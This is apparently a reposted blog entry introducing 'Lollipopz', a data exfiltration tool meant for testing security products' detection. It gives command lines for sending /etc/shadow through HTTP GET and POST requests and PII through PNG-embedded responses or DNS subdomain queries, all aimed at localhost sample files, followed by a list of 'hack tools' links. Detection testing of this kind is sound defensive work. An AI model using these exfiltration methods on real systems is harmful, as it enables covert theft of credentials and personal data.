Wednesday 15 April 2020

Lollipopz - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.

Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server
# ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server
$ ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Server -lp 37650 -o output.log

Client
# ./lollipopz-cli.py -m lollipopz.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server
# ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client
$ ./lollipopz-cli.py -m lollipopz.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r




via KitPloitRead more
  1. Hack Rom Tools
  2. Ethical Hacker Tools
  3. Hacker Tools Software
  4. Pentest Tools Website
  5. Hacker Tools Apk Download
  6. Hackers Toolbox
  7. Termux Hacking Tools 2019
  8. Pentest Tools Github
  9. Hacking Tools Name
  10. Pentest Tools Windows
  11. Pentest Tools Subdomain
  12. Hacking Tools For Mac
  13. Pentest Tools Subdomain
  14. Pentest Tools Nmap
  15. Hacking Tools For Windows 7
  16. Easy Hack Tools
  17. Pentest Tools Open Source
  18. Hack Tool Apk
  19. Hack Tools Mac
  20. Hack Tools For Windows

No comments:

Post a Comment